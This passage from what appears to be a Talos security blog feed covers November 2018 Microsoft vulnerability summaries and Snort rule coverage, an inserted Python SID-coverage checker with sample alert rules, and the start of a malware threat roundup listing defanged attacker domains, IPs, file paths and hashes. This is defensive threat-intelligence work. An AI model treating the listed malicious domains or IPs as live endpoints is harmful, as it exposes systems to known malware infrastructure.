ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts Internet Explorer's rendering engine.<br /><br />ADV180025 addresses several vulnerabilities in Adobe Flash Player, which are outlined by Adobe in a separate release. Microsoft recommends updating to the latest version of Flash Player, as well as disabling Flash in its web browsers.<br /><br /><h2 style="text-align: left;">Important vulnerabilities</h2>There are also 40 important vulnerabilities in this release. We would like to specifically highlight seven of them.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8256">CVE-2018-8256</a> is a remote code execution vulnerability in PowerShell that arises when it improperly handles specially crafted files. An attacker could execute malicious code on a vulnerable system. 
This update fixes the vulnerability by ensuring that PowerShell properly handles files.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8574">CVE-2018-8574</a> and <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8577">CVE-2018-8577</a> are remote code execution vulnerabilities in Microsoft Excel that occur when the software fails to properly handle objects in memory. An attacker could exploit these bugs by tricking the user into opening a specially crafted Excel file, either as an email attachment or by another method.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8582">CVE-2018-8582</a> is a remote code execution vulnerability in Microsoft Outlook that occurs when the software fails to properly parse specially modified rule export files. Users whose accounts are configured with fewer user rights are less affected by this vulnerability than those who operate with administrative rights. Workstations and terminal servers that use Microsoft Outlook are also at risk. An attacker needs to convince a user to open a specially crafted rule export file in an email in order to trigger this bug.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8450">CVE-2018-8450</a> is a remote code execution vulnerability that exists when Windows Search handles objects in memory. An attacker could trigger this vulnerability by sending specially crafted messages to the Windows Search service, or via an SMB connection.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8550">CVE-2018-8550</a> is an elevation of privilege vulnerability in the Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. 
The vulnerability does not by itself allow arbitrary code execution, but it could be used in conjunction with other bugs to execute code with elevated privileges.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8570">CVE-2018-8570</a> is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. An attacker could exploit this bug by hosting a malicious website and convincing the user to visit it in Internet Explorer.<br /><br />The other important vulnerabilities are:<br /><ul style="text-align: left;"><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8408">CVE-2018-8408</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8415">CVE-2018-8415</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8417">CVE-2018-8417</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8471">CVE-2018-8471</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8485">CVE-2018-8485</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8522">CVE-2018-8522</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8524">CVE-2018-8524</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8539">CVE-2018-8539</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8545">CVE-2018-8545</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8547">CVE-2018-8547</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8549">CVE-2018-8549</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8552">CVE-2018-8552</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8554">CVE-2018-8554</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8558">CVE-2018-8558</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8561">CVE-2018-8561</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8562">CVE-2018-8562</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8563">CVE-2018-8563</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8564">CVE-2018-8564</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8565">CVE-2018-8565</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8566">CVE-2018-8566</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8567">CVE-2018-8567</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8568">CVE-2018-8568</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8572">CVE-2018-8572</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8573">CVE-2018-8573</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8575">CVE-2018-8575</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8576">CVE-2018-8576</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8578">CVE-2018-8578</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8579">CVE-2018-8579</a></li><li><a 
href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581">CVE-2018-8581</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8584">CVE-2018-8584</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8589">CVE-2018-8589</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8592">CVE-2018-8592</a>&nbsp;</li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8407">CVE-2018-8407</a></li></ul><h2 style="text-align: left;">Moderate vulnerabilities</h2>The one moderate vulnerability is <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8546">CVE-2018-8546</a>, a denial-of-service vulnerability in the Skype video messaging service.<br /><br /><h2 style="text-align: left;">Low vulnerability</h2>There is also one low-rated vulnerability, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8416">CVE-2018-8416</a>, which is a tampering vulnerability in the .NET Core.<br /><a href="http://2.bp.blogspot.com/-Z50YbM6x1UQ/W-sgysmyNtI/AAAAAAAAEms/Hosgxldu4Z07rJvRjEHjJNXF6aCQgnYAACK4BGAYYCw/s1600/patch_availability_available.jpg" imageanchor="1"><img border="0" height="128" src="https://2.bp.blogspot.com/-Z50YbM6x1UQ/W-sgysmyNtI/AAAAAAAAEms/Hosgxldu4Z07rJvRjEHjJNXF6aCQgnYAACK4BGAYYCw/s640/patch_availability_available.jpg" width="640" /></a><br /><h2 style="text-align: left;">Coverage</h2>In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. 
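A quick way to confirm that the rules named in this post are actually deployed, as an added example and not code from the Talos post or from the Snort project: the Python script below parses the SID list given at the end of this Coverage section (a comma-separated list with inclusive ranges such as 48399 - 48404), pulls the `sid:` values out of a rules file, skips commented-out rules since a rule that is present but disabled provides no coverage, and reports which advisory SIDs are missing. The rules file here is a constructed sample of a few lines, not a real Talos rule snapshot; pass your own rules files on the command line to run it against a deployment.

```python
"""Check a Snort rules file for the SIDs named in a Talos advisory.

Added example, not from the Talos post or the Snort project. The SID list is
the one given under Coverage in this post; the rules file is a constructed
sample, not a real Talos rule snapshot.
"""
import re
import sys
from typing import Dict, List, Set

# SID list as written in the post's Coverage section (ranges are inclusive).
ADVISORY_SIDS_TEXT = (
    "32637, 45142, 45143, 48399 - 48404, 48374 - 48388, "
    "48393 - 48395, 48360 - 48373, 48408 - 48410"
)

# Constructed sample rules file: two live Chakra rules, one rule that has been
# commented out (disabled), one older SMB rule, and a comment line.
SAMPLE_RULES = """\
# constructed sample, not a real Talos ruleset
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BROWSER-IE Microsoft Edge Chakra memory corruption attempt"; flow:to_client,established; sid:48399; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BROWSER-IE Microsoft Edge Chakra memory corruption attempt"; flow:to_client,established; sid:48400; rev:1;)
# alert udp $EXTERNAL_NET any -> $HOME_NET 69 (msg:"OS-WINDOWS WDS TFTP request attempt"; sid:48374; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"OS-WINDOWS SMB request attempt"; flow:to_server,established; sid:32637; rev:3;)
"""

_RANGE = re.compile(r"^(\d+)\s*-\s*(\d+)$")
_SID = re.compile(r"\bsid\s*:\s*(\d+)\s*;")


def parse_sid_list(text: str) -> Set[int]:
    """Expand '32637, 48399 - 48404, ...' into the full set of SIDs."""
    sids: Set[int] = set()
    for token in text.split(","):
        token = token.strip()
        if not token:
            continue
        m = _RANGE.match(token)
        if m:
            lo, hi = int(m.group(1)), int(m.group(2))
            if lo > hi:
                raise ValueError(f"bad SID range: {token}")
            sids.update(range(lo, hi + 1))
        else:
            sids.add(int(token))
    return sids


def enabled_sids(rules_text: str) -> Set[int]:
    """SIDs of rules that are actually enabled; commented-out lines are skipped."""
    found: Set[int] = set()
    for line in rules_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = _SID.search(stripped)
        if m:
            found.add(int(m.group(1)))
    return found


def check_coverage(advisory_text: str, rules_text: str) -> Dict[str, List[int]]:
    """Compare the advisory's SIDs with the SIDs the rules file enables."""
    expected = parse_sid_list(advisory_text)
    present = expected & enabled_sids(rules_text)
    return {
        "expected": sorted(expected),
        "present": sorted(present),
        "missing": sorted(expected - present),
    }


if __name__ == "__main__":
    # Usage: python check_sids.py [rules_file ...]; defaults to the sample above.
    text = SAMPLE_RULES
    if len(sys.argv) > 1:
        text = "\n".join(
            open(p, encoding="utf-8", errors="replace").read() for p in sys.argv[1:]
        )
    result = check_coverage(ADVISORY_SIDS_TEXT, text)
    print(f"{len(result['present'])}/{len(result['expected'])} advisory SIDs enabled")
    if result["missing"]:
        print("missing:", ", ".join(map(str, result["missing"])))
```

Against the sample, 3 of the 44 advisory SIDs are enabled; SID 48374 is in the file but reported missing because its line is commented out, which is the case the check is meant to catch. Shared-object rules ship as stub files with the same `sid:` syntax, so they can be passed in alongside the text rules. On Firepower the equivalent check is the SRU version shown in the Firepower Management Center rather than a rules file on disk.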
Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.<br /><br /><br />Snort rules: <a href="https://snort.org/advisories/talos-rules-2018-11-13">32637, 45142, 45143, 48399 - 48404, 48374 - 48388, 48393 - 48395, 48360 - 48373, 48408 - 48410</a></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/Jiyuq1xupwg" height="1" width="1" alt=""/>2018-12-13T14:22:25.802-05:000https://blog.talosintelligence.com/2018/11/microsoft-patch-tuesday-october-2018_13.htmlThreat Roundup for November 2 to November 9http://feedproxy.google.com/~r/feedburner/Talos/~3/1YTslLRAkqg/threat-roundup-1102-1109.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 09 Nov 2018 08:50:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-5978183921454380852<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 02 and Nov. 09. As with previous roundups, this post isn't meant to be an in-depth analysis. 
Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional JSON file <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5be5b7aceb613.txt">here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. The hash lists in this blog post are limited to 25 per threat. As always, please remember that all IOCs contained in this document are indicators, and a single IOC does not indicate maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Doc.Malware.00536d-6741783-0</b><br /> Malware<br /> Doc.Malware.00536d-6741783-0 is a family of malicious documents that leverage obfuscated VBA and PowerShell scripts to download malicious binaries from the internet and infect the system. These documents use WMI to launch the downloaded binaries and can deliver different types of payloads.<br />&nbsp;</li><li><b>Win.Malware.Nymaim-6742391-0</b><br /> Malware<br /> Win.Malware.Nymaim-6742391-0 is malware that can be used to deliver ransomware and other malicious payloads. 
It uses a domain generation algorithm to generate potential command and control (C2) domains from which it retrieves additional payloads.<br />&nbsp;</li><li><b>Doc.Malware.00536d-6741218-0</b><br /> Malware<br /> Doc.Malware.00536d-6741218-0 is the name given to a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.<br />&nbsp;</li><li><b>Win.Trojan.Gamarue-6739927-0</b><br /> Trojan<br /> Win.Trojan.Gamarue-6739927-0 covers a family that, after installing itself on the system so that it persists across reboots, spreads itself to USB drives and modifies system configuration settings to weaken security and disable certain features, such as the task manager or the Windows shell, in order to protect itself. It can exfiltrate sensitive data and receive additional commands.<br />&nbsp;</li><li><b>Win.Malware.Mikey-6739644-0</b><br /> Malware<br /> Win.Malware.Mikey-6739644-0 is a trojan that installs itself on the system, collects information and communicates with a C2 server, potentially exfiltrating sensitive information. These types of threats can also receive additional commands and perform other malicious actions on the system, such as installing additional malware upon request.<br />&nbsp;</li><li><b>Win.Worm.Brontok-6739140-0</b><br /> Worm<br /> Win.Worm.Brontok is an email worm that can copy itself onto USB drives. It can change system configuration to weaken its security settings, conduct distributed denial-of-service attacks, and perform other malicious actions on the infected systems.<br />&nbsp;</li><li><b>Win.Trojan.Autoruner-6733593-0</b><br /> Trojan<br /> Autoruner belongs to the Esfury family. Esfury is a type of worm that commonly spreads via removable drives or platforms with user interaction (e.g. emails, instant messages, web pages). 
When executed, Esfury modifies multiple registry keys in order to execute when certain Windows applications are opened, including security products, registry editor and task manager. Esfury may also contact a remote server to download and execute arbitrary files.<br />&nbsp;</li><li><b>Doc.Downloader.Emotet-6744157-1</b><br /> Downloader<br /> Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Doc.Malware.00536d-6741783-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>92[.]242[.]63[.]202</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>nosenessel[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%AppData%\Microsoft\Word\STARTUP</li><li>%AppData%\Microsoft\Office\Recent\349314338.doc.LNK</li><li>%LocalAppData%\Temp\icn3tzqs.qav.psm1</li><li>%LocalAppData%\Temp\lgisqtyq.v2z.ps1</li><li>%AppData%\1bb228b0.exe</li></ul><b>File Hashes</b><br /><ul><li>1e0bd69fa2c12403b9077c42ebe1bd4d997cdd3d8f1160e7fcab0e52b2965a51</li><li>24b727b94bc1ef9b3d99ae6cfb0333db51321ce3646a78a20f59f2accf2b4207</li><li>39a3e2237ac464b2eac90dfd103fb9829cd6dabf425c72c1043678a47161ef08</li><li>5c534ae4e830cf73ddc02a19368138b60bfe0cd8ab12d1bb89106872fb735539</li><li>6ac5f9318f1a4db50373f4763edd01aa85aa3e6d8637149b52deb23478acb358</li><li>6cc51b903fd07d87102d0d6eb7d6614b75921a5c1210993f67d0fe21effb45a8</li><li>74df3318eac202ebbe0aea03d0fa5bdfc5fcd4feeb7ffc972fbce8e69f5597e5</li><li>7f96371e446f1b9ddba9fddfcc8cf0f07beb26de8a2b1783414f0cf5f4c50530</li><li>893b067586eb6d303aae26addf02f5bf4bfa2bd677cd0a96b1ebc20b05c3cf38</li><li>90cb72a9707af427f9dc874a44f26511ef7d9c82606783aff4d609e15f2bb441</li><li>97e01b5a1cf7a4e79c383ae6fbd1314466f75c9c03c5c663193b05ec8eee4fd9</li><li>a5795dac579590b099f9fb41037aa8febf3b0423d64990f496a2c3698f874f04</li><li>ae5bdac5fd5fbd09c0cdf2940291bef19ffacc0324a5ffaa56976934fea34c6e</li><li>aeeaca88ec0fb0e4a6fbbf07824712100522a73c0607f416e377ad4c87045a3c</li><li>b85de0b45a9634af9cf3a4026af2d5e743457dc9b284c89c704b0794b2565fd2</li><li>bfdd22f0ff5728885bbd364316e74f544a7fcbcd487f3948aaece5ba0aae1e42</li><li>c971f20312204409ac651ecb7b1a3eb50034f0362e4e96fc86be2d4c4afe9c84</li><li>d12832f6d0c374bd6525a7ad1458f3e8808bb8fb3e1c73cdd3e23d94bf219aaf</li><li>d236416e4940fdbee40f8e8457ab28ba9fca779147c92475222d9d92f26923d7</li><li>d4b688389477443d6e8ce9963e08cea45208e54a44a43fd2eedce6a4c0d183d3</li><li>dc2fcd6b057c26db0218ae05928653bba568a1486490aa4d052efb5c9c80617d</li><li>f14c41e682010bb6ebf436d83b2e97f7f31e07aff46850e055511b49cb851f36</li><li>f272476efe9202bba15dbb7cf7c13ef3918391f7743fa4267d220cd103ce05a3</li></ul>
<br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-yq1locNDHFE/W-W0bCVIJTI/AAAAAAAABHM/Del5nPMuhlQapc5J0erCKG6OAicBNv9TQCLcBGAs/s1600/97e01b5a1cf7a4e79c383ae6fbd1314466f75c9c03c5c663193b05ec8eee4fd9_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-yq1locNDHFE/W-W0bCVIJTI/AAAAAAAABHM/Del5nPMuhlQapc5J0erCKG6OAicBNv9TQCLcBGAs/s400/97e01b5a1cf7a4e79c383ae6fbd1314466f75c9c03c5c663193b05ec8eee4fd9_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-3rATPnE57_s/W-W0o86LlHI/AAAAAAAABHQ/XMPYGSteLPIzOfrG0CYPHnPZbipwnrVJgCLcBGAs/s1600/aeeaca88ec0fb0e4a6fbbf07824712100522a73c0607f416e377ad4c87045a3c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://4.bp.blogspot.com/-3rATPnE57_s/W-W0o86LlHI/AAAAAAAABHQ/XMPYGSteLPIzOfrG0CYPHnPZbipwnrVJgCLcBGAs/s640/aeeaca88ec0fb0e4a6fbbf07824712100522a73c0607f416e377ad4c87045a3c_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-1zU6X4ilwoM/W-W0uW2-iVI/AAAAAAAABHY/hy_KHoOqM9gqT521cp4geQ5BceLxqmRHwCLcBGAs/s1600/39a3e2237ac464b2eac90dfd103fb9829cd6dabf425c72c1043678a47161ef08_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://1.bp.blogspot.com/-1zU6X4ilwoM/W-W0uW2-iVI/AAAAAAAABHY/hy_KHoOqM9gqT521cp4geQ5BceLxqmRHwCLcBGAs/s640/39a3e2237ac464b2eac90dfd103fb9829cd6dabf425c72c1043678a47161ef08_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-7U-s-kbFbvw/W-W0ziaSKoI/AAAAAAAABHc/uxngjmP43s83fMpUxaOFYQ2A1Ee1FqgGQCLcBGAs/s1600/1e0bd69fa2c12403b9077c42ebe1bd4d997cdd3d8f1160e7fcab0e52b2965a51_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-7U-s-kbFbvw/W-W0ziaSKoI/AAAAAAAABHc/uxngjmP43s83fMpUxaOFYQ2A1Ee1FqgGQCLcBGAs/s640/1e0bd69fa2c12403b9077c42ebe1bd4d997cdd3d8f1160e7fcab0e52b2965a51_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Malware.Nymaim-6742391-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fro.dfx</li><li>%SystemDrive%\Documents and Settings\All Users\pxs\pil.ohu</li></ul><b>File Hashes</b><br /><ul><li>079c12699c6dbd13e486a4c7db333ec114420da38acde8afe4d62219c62afd82</li><li>1e12e3edeb209993fd7d5623fb10f342dca54e101ea8593348d8cc9e72e91384</li><li>303f8d6644e52783c8d4ebdef5d4e720803e828529eef24607806cb6041d1adc</li><li>31605081f5b8b138ff011fa6e796e6d2352160ad4a97ba07de4fbb38dd1cb41c</li><li>5056a547e092c82e74a2da61a5a90eb2a7e7e551e39a3387753917bedf8c3130</li><li>57e97b8dbfe3e8831b9b7bbcaef974e7d8c9422a15560453b0fde22b0fe3dc94</li><li>86bd123441e1b1ed3f37938b58dbc572b844e7ba8e59506ccd41fd0d9d950628</li><li>87c04d2500b70ebf0865d5ac5889f13bdc86d0a137dd1a20094a3308b52ac191</li><li>899752fd8fbe560e658be72bf03a3a774b6dcb9d2d14e25da862d7edce5d9fbf</li><li>8afc084c965d1c0091b61744c7cc5bd9cf5cb48195a6b04096dfe80ca118fd26</li><li>91e2920a163dec32f3edd8ff50a8b545fb192ad3d75c2ee96db6ac9b01f373dd</li><li>a20d48b79e72d3fc229929af39560ac26504fd31d20a7b29b81a4624eda6a0b9</li><li>a98b56d5bd9e67da1d1052cc044af7f45cc0a6472093799466d48e6f841016db</li><li>ae038c14c8eb49ecd135bb667bc3f96dc38e40e6df58d8475f2298b0a5a3c69c</li><li>cd9fa3f18f1108d2c1fefd8f978c167de8139c66c28638bfbc799c3b7b1cfd5a</li><li>e694c1f807a97327fbbed467fed853c289e014d368dffacde9b8b62c2f68595f</li><li>ee133570f883ea59f5ddd1f71ed9c6d09b0d7291c639d33d7991fa3af9956f84</li><li>f359d51daf2f35ce8f2f7a0bd82b29db843caf8089cf9eff9b6d95fb503fa071</li><li>f751ceca4b32c1af8e890a727aa2c65c63015798b380518af8255722cdbaca5f</li><li>fc1edb4659342e728ad83ac651f7d0d34532ad1f184796a1bed495072655af56</li><li>ff3a4f6aa65acbdd0c82c80041809e019802e4f700f0b2a5748bbc40b45889be</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a 
href="https://4.bp.blogspot.com/-pqqOBLmq1x8/Wz-6g4iUTzI/AAAAAAAAAck/O6pPV_knH3Yi4btEKyh6Dtx-nHP7fC7CwCLcBGAs/s320/no-network-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-pqqOBLmq1x8/Wz-6g4iUTzI/AAAAAAAAAck/O6pPV_knH3Yi4btEKyh6Dtx-nHP7fC7CwCLcBGAs/s320/no-network-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BQPh7LIrbww/W-W1FcbqY-I/AAAAAAAABHs/xDhsRYxaoPwZRRVCvoobH5YTCARSL4lzgCLcBGAs/s1600/cd9fa3f18f1108d2c1fefd8f978c167de8139c66c28638bfbc799c3b7b1cfd5a_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-BQPh7LIrbww/W-W1FcbqY-I/AAAAAAAABHs/xDhsRYxaoPwZRRVCvoobH5YTCARSL4lzgCLcBGAs/s400/cd9fa3f18f1108d2c1fefd8f978c167de8139c66c28638bfbc799c3b7b1cfd5a_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-pOvpdW0JExc/W-W1L4121sI/AAAAAAAABHw/I8Ned0skF7YOX3mwXBc0DYYLE2aWeXZPwCLcBGAs/s1600/e694c1f807a97327fbbed467fed853c289e014d368dffacde9b8b62c2f68595f_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="962" height="162" src="https://3.bp.blogspot.com/-pOvpdW0JExc/W-W1L4121sI/AAAAAAAABHw/I8Ned0skF7YOX3mwXBc0DYYLE2aWeXZPwCLcBGAs/s640/e694c1f807a97327fbbed467fed853c289e014d368dffacde9b8b62c2f68595f_tg.png" width="640" /></a></div><br /><br /><h3>Doc.Malware.00536d-6741218-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA 
</li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust </li><li>&lt;HKLM&gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Canon PIXMA MG2520\PrinterDriverData </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>92[.]242[.]63[.]202</li><li>95[.]181[.]198[.]72</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>222[.]222[.]67[.]208[.]in-addr[.]arpa</li><li>suggenesse[.]com</li><li>legicalpan[.]com</li><li>gulamicros[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\5jootfr4.adu.ps1</li><li>%LocalAppData%\Temp\e2dn4nhu.cmdline</li><li>%LocalAppData%\Temp\uju0ohji.0.cs</li><li>%LocalAppData%\Temp\uju0ohji.cmdline</li><li>%LocalAppData%\Temp\uju0ohji.dll</li><li>%LocalAppData%\Temp\e2dn4nhu.dll</li></ul><b>File Hashes</b><br 